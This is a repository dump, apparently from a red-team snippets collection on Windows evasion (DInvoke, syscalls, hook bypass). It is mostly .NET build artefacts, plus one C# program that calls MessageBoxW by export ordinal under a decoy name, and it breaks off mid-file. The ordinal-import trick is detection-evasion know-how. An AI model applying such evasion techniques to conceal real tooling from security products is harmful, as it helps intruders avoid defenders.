/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | f1d791e42d3bccd1c48106d85910be18dbf5cba6
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = MessageBoxW_DIvoke
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DInvoke.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DIvoke.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "dxJv26YaFJvd5EeJoi/kq1XCYG6OAtayh6Z4OWkVUt5fmhy1yk8PQULjnZic8qEi8RGRncwiqV4zWb6W/GZkBw==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DInvoke.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "ConsoleApp1.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "ConsoleApp1/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke_Syscalls\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | b31ed79f3e4190b809f1aa8db22f513b40fba58a
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "idqgkXj4YR79iFvMjG/5hb5UhChBxPT5UUcFWEq/bFVUqYDfRbpnPsOPfseDkfNQniGO0Ynq1BYiK5kkuK29aA==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke_Syscalls\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "ConsoleApp1.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "ConsoleApp1/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\HookBypass\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | ee34b10399e914a8aedc3d5bcc7c2cad3704dcb8
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "Qa6dvrVwNTxdRmvSiTGiddzLTnQou+7/9KlhkWeN3bCzmLieRFrfYHHUPK9NFcoZBQzQag36RTDJtgYLvXGWOg==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\HookBypass\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/HookBypass/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
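namespace Ordinals
{
    // Minimal example of a P/Invoke declaration that binds to a user32.dll
    // export by ordinal number instead of by name.
    internal class Program
    {
        // Import bound to ordinal 2164 (0x0874) of user32.dll. The author read
        // this value from the DLL's export address table with PEview, where it
        // was listed for MessageBoxW. The managed name NotAMessageBox is
        // arbitrary, because EntryPoint selects the export.
        //
        // Export ordinals of system DLLs are not a documented, stable contract.
        // On a different user32.dll build the same number may be absent (the
        // call then throws EntryPointNotFoundException) or may belong to another
        // export whose signature does not match this declaration.
        //
        // For analysis: the string "MessageBoxW" does not appear in this
        // declaration, but the assembly's P/Invoke metadata still records the
        // module name and the "#2164" entry point. That pair can be resolved
        // against the export table of the matching user32.dll build.
        //
        // DefaultDllImportSearchPaths restricts the library load to the System32
        // directory instead of relying on the default probing order.
        [DllImport("user32.dll", EntryPoint = "#2164", CharSet = CharSet.Unicode)]
        [DefaultDllImportSearchPaths(DllImportSearchPath.System32)]
        static extern int NotAMessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

        // Entry point: calls the ordinal-bound import once, passing IntPtr.Zero
        // as hWnd and 0 as uType (MB_OK when the export is MessageBoxW). The
        // returned int is ignored and args is unused.
        static void Main(string[] args)
        {
            NotAMessageBox(IntPtr.Zero, "Ordinal!!", "Ordinal", 0);
        }
    }
}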
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "message_box_ordinal/1.0.0": {
10 | "runtime": {
11 | "message_box_ordinal.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "message_box_ordinal/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/message_box_ordinal.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 812328a406d511f0cb86ca1de9b6c979e8ce68f5
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = message_box_ordinal
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\message_box_ordinal\message_box_ordinal\
4 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 94ce58349191cbc449fdb3720ceffeb425f4bcfd
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 46fa7d9c7209793a53c6eecb31254525cde9465c
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/message_box_ordinal.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "n5d2sI7PqLshZtvMBRBPM2qNVlUVNYYAUTAH+ZMLHmHyoGv2yIjUZjDc77tEFY16/f0OCJ+2eQ8tm1h8ABO9rQ==",
4 | "success": true,
